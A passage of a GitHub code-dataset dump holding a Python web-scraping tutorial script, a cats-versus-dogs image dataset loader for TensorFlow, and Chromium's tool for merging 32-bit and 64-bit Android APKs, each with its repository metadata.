csv_writer.writerow([stock, price])\n\nfrom bs4 import BeautifulSoup\nimport requests\n\n# I put the relevant HTML file on GitHub. In order to fit\n# the URL in the book I had to split it across two lines.\nurl = \"https://raw.githubusercontent.com/joelgrus/data/master/getting-data.html\"\nhtml = requests.get(url).text\nsoup = BeautifulSoup(html,'html5lib')\n\n# to find the fist

    tag and its content\nfirst_paragraph = soup.find('p') # or just soup.p\nfirst_paragraph_text = soup.p.text\nfirst_paragraph_words = soup.p.text.split()\nprint(first_paragraph, first_paragraph_text, first_paragraph_words)\n\nfirst_paragraph_id = soup.p['id']\nfirst_paragraph_id2 = soup.p.get('id')\nprint(first_paragraph_id, first_paragraph_id2)\n\n# to get multiple tags at once\nall_paragraphs = soup.find_all('p') # or just soup('p')\nparagraphs_with_ids = [p for p in soup('p') if p.get('id')]\nprint(all_paragraphs, paragraphs_with_ids)\n\n# to find tags with a specific class\nimportant_paragraphs = soup('p',{'class': 'important'})\nimportant_paragraphs2 = soup('p','important')\nimportant_paragraphs3 = [p for p in soup('p')\n if 'important' in p.get('class',[])]\n\nprint(important_paragraphs, important_paragraphs2, important_paragraphs3)\n\n# to get spans inside divs\nspans_inside_divs = [span\n for div in soup('div')\n for span in div('span')]\nprint(spans_inside_divs)\n\n# to collect all of the URLs linked to\nfrom bs4 import BeautifulSoup\nimport requests\n\nurl = \"https://www.house.gov/representatives\"\ntext = requests.get(url).text\nsoup = BeautifulSoup(text, 'html5lib')\n\nall_urls = [a['href']\n for a in soup('a')\n if a.has_attr('href')]\n\nprint(all_urls)\nprint(len(all_urls))\n\n\nimport re\n# must start with http:// or https://\n# must end with .house.gov or .house.gov/\nregex = r\"^https?://.*\\.house\\.gov/?$\"\n\n#Let's write some tests!\nassert re.match(regex, \"http://joel.house.gov\")\nassert re.match(regex, \"https://joel.house.gov\")\nassert re.match(regex, \"http://joel.house.gov/\")\nassert re.match(regex, \"https://joel.house.gov/\")\nassert not re.match(regex, \"joel.house.gov\")\nassert not re.match(regex, \"http://joel.house.com\")\nassert not re.match(regex, \"https://joel.house.gov/biography\")\n\n#And now apply\ngood_urls = [url for url in all_urls if re.match(regex, url)]\nprint(good_urls)\nprint(len(good_urls))\n\n# to get rid of duplicate ones\ngood_urls = list(set(good_urls))\nprint(good_urls)\nprint(len(good_urls))\n\nhtml = requests.get('https://jayapal.house.gov').text\nsoup = BeautifulSoup(html, 'html5lib')\n\n# use a set because the links might appear multiple times.\nlinks = {a['href'] for a in soup('a') if 'press releases' in a.text.lower()}\nprint(links)\n\nif 0 :\n from typing import Dict, Set\n\n press_releases: Dict[str, Set[str]] = {}\n\n for house_url in good_urls:\n html = requests.get(house_url).text\n soup = BeautifulSoup(html, 'html5lib')\n\n pr_links = {a['href'] for a in soup('a') if 'press releases' in a.text.lower()}\n print(f\"{house_url}: {pr_links}\")\n\n press_releases[house_url] = pr_links\n\n print(press_releases)\n\ndef paragraph_mentions(text: str, keyword: str) -> bool:\n \"\"\" Returns True if

    inside the text mentions {keyword}\"\"\"\n soup = BeautifulSoup(text, \"html5lib\")\n paragraphs = [p.get_text() for p in soup('p')]\n\n return any(keyword.lower() in paragraph.lower()\n for paragraph in paragraphs)\n\ntext = \"\"\"

    Facebook

    Twitter

    \"\"\"\n#result = paragraph_mentions(text, \"twitter\")\n#print(\"twitter in

    \", result)\n#result = paragraph_mentions(text, \"facebook\")\n#print(\"facebook in

    \", result)\nassert paragraph_mentions(text, \"twitter\") # is inside

    \nassert not paragraph_mentions(text, \"facebook\") # not inside

    \n\n# get \"data\" in press_releases\nif 0 :\n for house_url, pr_link in press_releases.items():\n for pr_link in pr_links:\n url = f\"{house_url}/{pr_link}\"\n text = requests.get(url).text\n\n if paragraph_mentions(text, \"data\"):\n print(f\"{house_url}\")\n break #done with this house_url\n\n# serialization\nimport json\nserialized = \"\"\"{\"title\": \"Data Science Book\",\n \"author\": \"Joel Grus\",\n \"publicationYear\": 2019,\n \"topics\": [ \"data\", \"science\", \"data science\" ] }\"\"\"\n\n#parse the JSON to create a Python dict\ndeserialized = json.loads(serialized)\nprint(deserialized)\nassert deserialized[\"publicationYear\"] == 2019\nassert \"data science\" in deserialized[\"topics\"]\n\ngithub_user = \"joelgrus\"\nendpoint = f\"https://api.github.com/users/{github_user}/repos\"\nprint(endpoint)\nrepos = json.loads(requests.get(endpoint).text)\nprint(repos)\n\nfrom collections import Counter\nfrom dateutil.parser import parse\n\ndates = [parse(repo[\"created_at\"]) for repo in repos]\nprint(\"created at\", dates)\nmonth_counts = Counter(date.month for date in dates)\nprint(\"month_counts:\", month_counts)\nweekday_counts = Counter(date.weekday() for date in dates)\nprint(\"weekday_counts:\", weekday_counts)\n\n# get the language of my last five repos\nlast_5_repos = sorted(repos,\n key = lambda r: r[\"pushed_at\"],\n reverse = True)[:5]\nlast_5_languages = [repo[\"language\"] for repo in last_5_repos]\nprint(last_5_languages)\n\n#list of python api wrappers:\n# https://github.com/realpython/list-of-python-api-wrappers\n\n\n", "repo_name": "wenyuc/datascience", "sub_path": "getting_data.py", "file_name": "getting_data.py", "file_ext": "py", "file_size_in_byte": 7302, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "csv.reader", "line_number": 33, "usage_type": "call"}, {"api_name": "csv.DictReader", "line_number": 48, "usage_type": "call"}, {"api_name": "csv.writer", "line_number": 58, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 68, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 69, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 105, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 106, "usage_type": "call"}, {"api_name": "re.match", "line_number": 122, "usage_type": "call"}, {"api_name": "re.match", "line_number": 123, "usage_type": "call"}, {"api_name": "re.match", "line_number": 124, "usage_type": "call"}, {"api_name": "re.match", "line_number": 125, "usage_type": "call"}, {"api_name": "re.match", "line_number": 126, "usage_type": "call"}, {"api_name": "re.match", "line_number": 127, "usage_type": "call"}, {"api_name": "re.match", "line_number": 128, "usage_type": "call"}, {"api_name": "re.match", "line_number": 131, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 140, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 141, "usage_type": "call"}, {"api_name": "typing.Dict", "line_number": 150, "usage_type": "name"}, {"api_name": "typing.Set", "line_number": 150, "usage_type": "name"}, {"api_name": "requests.get", "line_number": 153, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 154, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 165, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 184, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 198, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 206, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 206, "usage_type": "call"}, {"api_name": "dateutil.parser.parse", "line_number": 212, "usage_type": "call"}, {"api_name": "collections.Counter", "line_number": 214, "usage_type": "call"}, {"api_name": "collections.Counter", "line_number": 216, "usage_type": "call"}]} +{"seq_id": "37344074236", "text": "import os\nimport numpy as np\nimport cv2\nfrom skimage import transform\n\nfrom tensorflow.keras.utils import to_categorical\nfrom typing import Tuple\nfrom tensorflow.keras.preprocessing.image import ImageDataGenerator\nfrom sklearn.model_selection import train_test_split\n\n# %%\nDATA_DIR = os.path.join(\"C:/Selbststudium/Zubehoer/Cats_and_dogs\")\nX_FILE_PATH = os.path.join(DATA_DIR, \"x.npy\")\nY_FILE_PATH = os.path.join(DATA_DIR, \"y.npy\")\nIMG_SIZE = 64\nIMG_DEPTH = 3\nIMG_SHAPE = (IMG_SIZE, IMG_SIZE, IMG_DEPTH)\n\n# %%\ndef extract_cats_vs_dogs():\n # Bilder einlesen und preprocessing\n cats_dir = os.path.join(DATA_DIR, \"Cat\")\n dogs_dir = os.path.join(DATA_DIR, \"Dog\")\n dirs = [cats_dir, dogs_dir]\n class_names = [\"cat\", \"dog\"]\n # Was kein Bild ist, muss raus:\n for d in dirs:\n for f in os.listdir(d): # Alle Dateien, die in d liegen\n if f.split(\".\")[-1] != \"jpg\": # An der letzten Stelle der Liste, also die Dateiendung\n print(f\"Removing file: {f}\")\n os.remove(os.path.join(D, f))\n num_cats = len(os.listdir(cats_dir))\n num_dogs = len(os.listdir(dogs_dir))\n num_images = num_cats + num_dogs\n x = np.zeros(\n shape=(num_images, IMG_SIZE, IMG_SIZE, IMG_DEPTH),\n dtype=np.float32\n )\n y = np.zeros(\n shape=(num_images,),\n dtype=np.float32\n )\n\n cnt = 0\n for d, class_name in zip(dirs, class_names):\n for f in os.listdir(d):\n img_file_path = os.path.join(d, f)\n try:\n img = cv2.imread(img_file_path, cv2.IMREAD_COLOR)\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n x[cnt] = transform.resize(\n image=img,\n output_shape=IMG_SHAPE\n )\n if class_name == \"cat\":\n y[cnt] = 0\n elif class_name == \"dog\":\n y[cnt] = 1\n else:\n print(f\"Invalid classname\")\n cnt+=1\n except: # noqa: E722\n print(f\"Image could not be read\")\n os.remove(img_file_path)\n\n # Dropping not readable img_idxs\n x = x[:cnt]\n y = y[:cnt]\n\n np.save(X_FILE_PATH, x)\n np.save(Y_FILE_PATH, y)\n\n# %%\nclass DOGSCATS:\n def __init__(self, test_size: float = 0.2, validation_size = 0.33) -> None:\n # User-defined constants\n self.num_classes = 10\n self.batch_size = 128\n # Load dataset\n x = np.load(X_FILE_PATH)\n y = np.load(Y_FILE_PATH)\n # Split dataset\n x_train, x_test, y_train, y_test = train_test_split(x, y, test_size=test_size)\n x_train, x_val, y_train, y_val = train_test_split(x_train, y_train, test_size=validation_size)\n # Preprocess x\n self.x_train = x_train.astype(np.float32)\n self.x_test = x_test.astype(np.float32)\n self.x_val = x_val.astype(np.float32)\n # Preprocess y\n self.y_train = to_categorical(y_train, num_classes=self.num_classes)\n self.y_test = to_categorical(y_test, num_classes=self.num_classes)\n self.y_val = to_categorical(y_val, num_classes=self.num_classes)\n # Dataset attributes\n self.train_size = self.x_train.shape[0]\n self.test_size = self.x_test.shape[0]\n self.tval_size = self.x_val.shape[0]\n self.width = self.x_train.shape[1]\n self.height = self.x_train.shape[2]\n self.depth = self.x_train.shape[3]\n self.img_shape = (self.width, self.height, self.depth)\n\n def get_train_set(self) -> Tuple[np.ndarray, np.ndarray]:\n return self.train_dataset\n \n def get_test_set(self) -> Tuple[np.ndarray, np.ndarray]:\n return self.test_dataset\n\n def get_val_set(self) -> Tuple[np.ndarray, np.ndarray]:\n return self.val_dataset\n\n def data_augmentation(self, augment_size: int = 5_000) -> None:\n image_generator = ImageDataGenerator(\n rotation_range = 5,\n zoom_range=0.08,\n width_shift_range=0.08,\n height_shift_range=0.08\n )\n # Fit the data generator\n image_generator.fit(self.x_train, augment=True)\n # Get random train images for the data augmentation\n rand_idxs = np.random.randint(self.train_size, size=augment_size)\n x_augmented = self.x_train[rand_idxs].copy()\n y_augmented = self.y_train[rand_idxs].copy()\n x_augmented = image_generator.flow(\n x_augmented,\n np.zeros(augment_size),\n batch_size=augment_size,\n shuffle=False\n ).next()[0]\n # Append the augmented images to the train set\n self.x_train = np.concatenate((self.x_train, x_augmented))\n self.y_train = np.concatenate((self.y_train, y_augmented))\n self.train_size = self.x_train.shape[0]", "repo_name": "gvtsch/Udemy_Tensorflow", "sub_path": "Chapter9_AdvancedDL/Chapter9_1_CustomDataset/dogscatsData.py", "file_name": "dogscatsData.py", "file_ext": "py", "file_size_in_byte": 4828, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "os.path.join", "line_number": 12, "usage_type": "call"}, {"api_name": "os.path", "line_number": 12, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 13, "usage_type": "call"}, {"api_name": "os.path", "line_number": 13, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 14, "usage_type": "call"}, {"api_name": "os.path", "line_number": 14, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 22, "usage_type": "call"}, {"api_name": "os.path", "line_number": 22, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 23, "usage_type": "call"}, {"api_name": "os.path", "line_number": 23, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 28, "usage_type": "call"}, {"api_name": "os.remove", "line_number": 31, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 31, "usage_type": "call"}, {"api_name": "os.path", "line_number": 31, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 32, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 33, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 35, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 37, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 39, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 41, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 46, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 47, "usage_type": "call"}, {"api_name": "os.path", "line_number": 47, "usage_type": "attribute"}, {"api_name": "cv2.imread", "line_number": 49, "usage_type": "call"}, {"api_name": "cv2.IMREAD_COLOR", "line_number": 49, "usage_type": "attribute"}, {"api_name": "cv2.cvtColor", "line_number": 50, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2RGB", "line_number": 50, "usage_type": "attribute"}, {"api_name": "skimage.transform.resize", "line_number": 51, "usage_type": "call"}, {"api_name": "skimage.transform", "line_number": 51, "usage_type": "name"}, {"api_name": "os.remove", "line_number": 64, "usage_type": "call"}, {"api_name": "numpy.save", "line_number": 70, "usage_type": "call"}, {"api_name": "numpy.save", "line_number": 71, "usage_type": "call"}, {"api_name": "numpy.load", "line_number": 80, "usage_type": "call"}, {"api_name": "numpy.load", "line_number": 81, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 83, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 84, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 86, "usage_type": "attribute"}, {"api_name": "numpy.float32", "line_number": 87, "usage_type": "attribute"}, {"api_name": "numpy.float32", "line_number": 88, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.utils.to_categorical", "line_number": 90, "usage_type": "call"}, {"api_name": "tensorflow.keras.utils.to_categorical", "line_number": 91, "usage_type": "call"}, {"api_name": "tensorflow.keras.utils.to_categorical", "line_number": 92, "usage_type": "call"}, {"api_name": "typing.Tuple", "line_number": 102, "usage_type": "name"}, {"api_name": "numpy.ndarray", "line_number": 102, "usage_type": "attribute"}, {"api_name": "typing.Tuple", "line_number": 105, "usage_type": "name"}, {"api_name": "numpy.ndarray", "line_number": 105, "usage_type": "attribute"}, {"api_name": "typing.Tuple", "line_number": 108, "usage_type": "name"}, {"api_name": "numpy.ndarray", "line_number": 108, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.preprocessing.image.ImageDataGenerator", "line_number": 112, "usage_type": "call"}, {"api_name": "numpy.random.randint", "line_number": 121, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 121, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 126, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 131, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 132, "usage_type": "call"}]} +{"seq_id": "12780245175", "text": "import argparse\nimport collections\nimport filecmp\nimport logging\nimport os\nimport pprint\nimport re\nimport shutil\nimport sys\nimport tempfile\nimport zipfile\n\nSRC_DIR = os.path.join(os.path.dirname(__file__), '..', '..')\nSRC_DIR = os.path.abspath(SRC_DIR)\nBUILD_ANDROID_DIR = os.path.join(SRC_DIR, 'build', 'android')\nBUILD_ANDROID_GYP_DIR = os.path.join(BUILD_ANDROID_DIR, 'gyp')\nsys.path.append(BUILD_ANDROID_GYP_DIR)\n\nimport finalize_apk # pylint: disable=import-error\nfrom util import build_utils # pylint: disable=import-error\n\nsys.path.append(BUILD_ANDROID_DIR)\n\nfrom pylib import constants # pylint: disable=import-error\n\nDEFAULT_ZIPALIGN_PATH = os.path.join(\n SRC_DIR, 'third_party', 'android_tools', 'sdk', 'build-tools',\n constants.ANDROID_SDK_BUILD_TOOLS_VERSION, 'zipalign')\n\n\nclass ApkMergeFailure(Exception):\n pass\n\n\ndef UnpackApk(file_name, dst):\n zippy = zipfile.ZipFile(file_name)\n zippy.extractall(dst)\n\n\ndef GetNonDirFiles(top, base_dir):\n \"\"\" Return a list containing all (non-directory) files in tree with top as\n root.\n\n Each file is represented by the relative path from base_dir to that file.\n If top is a file (not a directory) then a list containing only top is\n returned.\n \"\"\"\n if os.path.isdir(top):\n ret = []\n for dirpath, _, filenames in os.walk(top):\n for filename in filenames:\n ret.append(\n os.path.relpath(os.path.join(dirpath, filename), base_dir))\n return ret\n else:\n return [os.path.relpath(top, base_dir)]\n\n\ndef GetDiffFiles(dcmp, base_dir):\n \"\"\" Return the list of files contained only in the right directory of dcmp.\n\n The files returned are represented by relative paths from base_dir.\n \"\"\"\n copy_files = []\n for file_name in dcmp.right_only:\n copy_files.extend(\n GetNonDirFiles(os.path.join(dcmp.right, file_name), base_dir))\n\n # we cannot merge APKs with files with similar names but different contents\n if len(dcmp.diff_files) > 0:\n raise ApkMergeFailure('found differing files: %s in %s and %s' %\n (dcmp.diff_files, dcmp.left, dcmp.right))\n\n if len(dcmp.funny_files) > 0:\n ApkMergeFailure('found uncomparable files: %s in %s and %s' %\n (dcmp.funny_files, dcmp.left, dcmp.right))\n\n for sub_dcmp in dcmp.subdirs.itervalues():\n copy_files.extend(GetDiffFiles(sub_dcmp, base_dir))\n return copy_files\n\n\ndef CheckFilesExpected(actual_files, expected_files, component_build):\n \"\"\" Check that the lists of actual and expected files are the same. \"\"\"\n actual_file_names = collections.defaultdict(int)\n for f in actual_files:\n actual_file_names[os.path.basename(f)] += 1\n actual_file_set = set(actual_file_names.iterkeys())\n expected_file_set = set(expected_files.iterkeys())\n\n unexpected_file_set = actual_file_set.difference(expected_file_set)\n if component_build:\n unexpected_file_set = set(\n f for f in unexpected_file_set if not f.endswith('.so'))\n missing_file_set = expected_file_set.difference(actual_file_set)\n duplicate_file_set = set(\n f for f, n in actual_file_names.iteritems() if n > 1)\n\n # TODO(crbug.com/839191): Remove this once we're plumbing the lib correctly.\n missing_file_set = set(\n f for f in missing_file_set if not os.path.basename(f) ==\n 'libarcore_sdk_c_minimal.so')\n\n errors = []\n if unexpected_file_set:\n errors.append(\n ' unexpected files: %s' % pprint.pformat(unexpected_file_set))\n if missing_file_set:\n errors.append(' missing files: %s' % pprint.pformat(missing_file_set))\n if duplicate_file_set:\n errors.append(' duplicate files: %s' % pprint.pformat(duplicate_file_set))\n\n if errors:\n raise ApkMergeFailure(\n \"Files don't match expectations:\\n%s\" % '\\n'.join(errors))\n\n\ndef AddDiffFiles(diff_files, tmp_dir_32, out_zip, expected_files,\n component_build, uncompress_shared_libraries):\n \"\"\" Insert files only present in 32-bit APK into 64-bit APK (tmp_apk). \"\"\"\n for diff_file in diff_files:\n if component_build and diff_file.endswith('.so'):\n compress = not uncompress_shared_libraries\n else:\n compress = expected_files[os.path.basename(diff_file)]\n build_utils.AddToZipHermetic(out_zip,\n diff_file,\n os.path.join(tmp_dir_32, diff_file),\n compress=compress)\n\n\ndef SignAndAlignApk(tmp_apk, signed_tmp_apk, new_apk, zipalign_path,\n keystore_path, key_name, key_password):\n try:\n finalize_apk.JarSigner(\n keystore_path,\n key_name,\n key_password,\n tmp_apk,\n signed_tmp_apk)\n except build_utils.CalledProcessError as e:\n raise ApkMergeFailure('Failed to sign APK: ' + e.output)\n\n try:\n finalize_apk.AlignApk(zipalign_path,\n signed_tmp_apk,\n new_apk)\n except build_utils.CalledProcessError as e:\n raise ApkMergeFailure('Failed to align APK: ' + e.output)\n\ndef GetSecondaryAbi(apk_zipfile, shared_library):\n ret = ''\n for name in apk_zipfile.namelist():\n if os.path.basename(name) == shared_library:\n abi = re.search('(^lib/)(.+)(/' + shared_library + '$)', name).group(2)\n # Intentionally not to add 64bit abi because they are not used.\n if abi == 'armeabi-v7a' or abi == 'armeabi':\n ret = 'arm64-v8a'\n elif abi == 'mips':\n ret = 'mips64'\n elif abi == 'x86':\n ret = 'x86_64'\n else:\n raise ApkMergeFailure('Unsupported abi ' + abi)\n if ret == '':\n raise ApkMergeFailure('Failed to find secondary abi')\n return ret\n\ndef MergeApk(args, tmp_apk, tmp_dir_32, tmp_dir_64):\n # Expected files to copy from 32- to 64-bit APK together with whether to\n # compress within the .apk.\n expected_files = {'snapshot_blob_32.bin': False}\n if args.shared_library:\n expected_files[args.shared_library] = not args.uncompress_shared_libraries\n if args.has_unwind_cfi:\n expected_files['unwind_cfi_32'] = False\n\n # TODO(crbug.com/839191): we should pass this in via script arguments.\n if not args.loadable_module_32:\n args.loadable_module_32.append('libarcore_sdk_c_minimal.so')\n\n for f in args.loadable_module_32:\n expected_files[f] = not args.uncompress_shared_libraries\n\n for f in args.loadable_module_64:\n expected_files[f] = not args.uncompress_shared_libraries\n\n # need to unpack APKs to compare their contents\n UnpackApk(args.apk_64bit, tmp_dir_64)\n UnpackApk(args.apk_32bit, tmp_dir_32)\n\n ignores = ['META-INF', 'AndroidManifest.xml']\n if args.ignore_classes_dex:\n ignores += ['classes.dex', 'classes2.dex']\n if args.debug:\n # see http://crbug.com/648720\n ignores += ['webview_licenses.notice']\n\n dcmp = filecmp.dircmp(\n tmp_dir_64,\n tmp_dir_32,\n ignore=ignores)\n\n diff_files = GetDiffFiles(dcmp, tmp_dir_32)\n\n # Check that diff_files match exactly those files we want to insert into\n # the 64-bit APK.\n CheckFilesExpected(diff_files, expected_files, args.component_build)\n\n with zipfile.ZipFile(tmp_apk, 'w') as out_zip:\n exclude_patterns = ['META-INF/*']\n\n # If there are libraries for which we don't want the 32 bit versions, we\n # should remove them here.\n if args.loadable_module_32:\n exclude_patterns.extend(['*' + f for f in args.loadable_module_32 if\n f not in args.loadable_module_64])\n\n build_utils.MergeZips(out_zip, [args.apk_64bit], exclude_patterns)\n AddDiffFiles(diff_files, tmp_dir_32, out_zip, expected_files,\n args.component_build, args.uncompress_shared_libraries)\n\n\ndef main():\n parser = argparse.ArgumentParser(\n description='Merge a 32-bit APK into a 64-bit APK')\n # Using type=os.path.abspath converts file paths to absolute paths so that\n # we can change working directory without affecting these paths\n parser.add_argument('--apk_32bit', required=True, type=os.path.abspath)\n parser.add_argument('--apk_64bit', required=True, type=os.path.abspath)\n parser.add_argument('--out_apk', required=True, type=os.path.abspath)\n parser.add_argument('--zipalign_path', type=os.path.abspath)\n parser.add_argument('--keystore_path', required=True, type=os.path.abspath)\n parser.add_argument('--key_name', required=True)\n parser.add_argument('--key_password', required=True)\n group = parser.add_mutually_exclusive_group(required=True)\n group.add_argument('--component-build', action='store_true')\n group.add_argument('--shared_library')\n parser.add_argument('--page-align-shared-libraries', action='store_true',\n help='Obsolete, but remains for backwards compatibility')\n parser.add_argument('--uncompress-shared-libraries', action='store_true')\n parser.add_argument('--debug', action='store_true')\n # This option shall only used in debug build, see http://crbug.com/631494.\n parser.add_argument('--ignore-classes-dex', action='store_true')\n parser.add_argument('--has-unwind-cfi', action='store_true',\n help='Specifies if the 32-bit apk has unwind_cfi file')\n parser.add_argument('--loadable_module_32', action='append', default=[],\n help='Use for each 32-bit library added via '\n 'loadable_modules')\n parser.add_argument('--loadable_module_64', action='append', default=[],\n help='Use for each 64-bit library added via '\n 'loadable_modules')\n args = parser.parse_args()\n\n if (args.zipalign_path is not None and\n not os.path.isfile(args.zipalign_path)):\n # If given an invalid path, fall back to try the default.\n logging.warning('zipalign path not found: %s', args.zipalign_path)\n logging.warning('falling back to: %s', DEFAULT_ZIPALIGN_PATH)\n args.zipalign_path = None\n\n if args.zipalign_path is None:\n # When no path given, try the default.\n if not os.path.isfile(DEFAULT_ZIPALIGN_PATH):\n return 'ERROR: zipalign path not found: %s' % DEFAULT_ZIPALIGN_PATH\n args.zipalign_path = DEFAULT_ZIPALIGN_PATH\n\n tmp_dir = tempfile.mkdtemp()\n tmp_dir_64 = os.path.join(tmp_dir, '64_bit')\n tmp_dir_32 = os.path.join(tmp_dir, '32_bit')\n tmp_apk = os.path.join(tmp_dir, 'tmp.apk')\n signed_tmp_apk = os.path.join(tmp_dir, 'signed.apk')\n new_apk = args.out_apk\n\n try:\n MergeApk(args, tmp_apk, tmp_dir_32, tmp_dir_64)\n\n SignAndAlignApk(tmp_apk, signed_tmp_apk, new_apk, args.zipalign_path,\n args.keystore_path, args.key_name, args.key_password)\n except ApkMergeFailure as exc:\n return 'ERROR: %s' % exc\n finally:\n shutil.rmtree(tmp_dir)\n return 0\n\n\nif __name__ == '__main__':\n sys.exit(main())\n", "repo_name": "kiwibrowser/src", "sub_path": "android_webview/tools/apk_merger.py", "file_name": "apk_merger.py", "file_ext": "py", "file_size_in_byte": 10617, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2475, "dataset": "github-code", "pt": "52", "api": [{"api_name": "os.path.join", "line_number": 13, "usage_type": "call"}, {"api_name": "os.path", "line_number": 13, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 13, "usage_type": "call"}, {"api_name": "os.path.abspath", "line_number": 14, "usage_type": "call"}, {"api_name": "os.path", "line_number": 14, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 15, "usage_type": "call"}, {"api_name": "os.path", "line_number": 15, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 16, "usage_type": "call"}, {"api_name": "os.path", "line_number": 16, "usage_type": "attribute"}, {"api_name": "sys.path.append", "line_number": 17, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 17, "usage_type": "attribute"}, {"api_name": "sys.path.append", "line_number": 22, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 22, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 26, "usage_type": "call"}, {"api_name": "os.path", "line_number": 26, "usage_type": "attribute"}, {"api_name": "pylib.constants.ANDROID_SDK_BUILD_TOOLS_VERSION", "line_number": 28, "usage_type": "attribute"}, {"api_name": "pylib.constants", "line_number": 28, "usage_type": "name"}, {"api_name": "zipfile.ZipFile", "line_number": 36, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 48, "usage_type": "call"}, {"api_name": "os.path", "line_number": 48, "usage_type": "attribute"}, {"api_name": "os.walk", "line_number": 50, "usage_type": "call"}, {"api_name": "os.path.relpath", "line_number": 53, "usage_type": "call"}, {"api_name": "os.path", "line_number": 53, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 53, "usage_type": "call"}, {"api_name": "os.path.relpath", "line_number": 56, "usage_type": "call"}, {"api_name": "os.path", "line_number": 56, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 67, "usage_type": "call"}, {"api_name": "os.path", "line_number": 67, "usage_type": "attribute"}, {"api_name": "collections.defaultdict", "line_number": 85, "usage_type": "call"}, {"api_name": "os.path.basename", "line_number": 87, "usage_type": "call"}, {"api_name": "os.path", "line_number": 87, "usage_type": "attribute"}, {"api_name": "os.path.basename", "line_number": 101, "usage_type": "call"}, {"api_name": "os.path", "line_number": 101, "usage_type": "attribute"}, {"api_name": "pprint.pformat", "line_number": 107, "usage_type": "call"}, {"api_name": "pprint.pformat", "line_number": 109, "usage_type": "call"}, {"api_name": "pprint.pformat", "line_number": 111, "usage_type": "call"}, {"api_name": "os.path.basename", "line_number": 125, "usage_type": "call"}, {"api_name": "os.path", "line_number": 125, "usage_type": "attribute"}, {"api_name": "util.build_utils.AddToZipHermetic", "line_number": 126, "usage_type": "call"}, {"api_name": "util.build_utils", "line_number": 126, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 128, "usage_type": "call"}, {"api_name": "os.path", "line_number": 128, "usage_type": "attribute"}, {"api_name": "finalize_apk.JarSigner", "line_number": 135, "usage_type": "call"}, {"api_name": "util.build_utils.CalledProcessError", "line_number": 141, "usage_type": "attribute"}, {"api_name": "util.build_utils", "line_number": 141, "usage_type": "name"}, {"api_name": "finalize_apk.AlignApk", "line_number": 145, "usage_type": "call"}, {"api_name": "util.build_utils.CalledProcessError", "line_number": 148, "usage_type": "attribute"}, {"api_name": "util.build_utils", "line_number": 148, "usage_type": "name"}, {"api_name": "os.path.basename", "line_number": 154, "usage_type": "call"}, {"api_name": "os.path", "line_number": 154, "usage_type": "attribute"}, {"api_name": "re.search", "line_number": 155, "usage_type": "call"}, {"api_name": "filecmp.dircmp", "line_number": 199, "usage_type": "call"}, {"api_name": "zipfile.ZipFile", "line_number": 210, "usage_type": "call"}, {"api_name": "util.build_utils.MergeZips", "line_number": 219, "usage_type": "call"}, {"api_name": "util.build_utils", "line_number": 219, "usage_type": "name"}, {"api_name": "argparse.ArgumentParser", "line_number": 225, "usage_type": "call"}, {"api_name": "os.path", "line_number": 229, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 230, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 231, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 232, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 233, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 256, "usage_type": "call"}, {"api_name": "os.path", "line_number": 256, "usage_type": "attribute"}, {"api_name": "logging.warning", "line_number": 258, "usage_type": "call"}, {"api_name": "logging.warning", "line_number": 259, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 264, "usage_type": "call"}, {"api_name": "os.path", "line_number": 264, "usage_type": "attribute"}, {"api_name": "tempfile.mkdtemp", "line_number": 268, "usage_type": 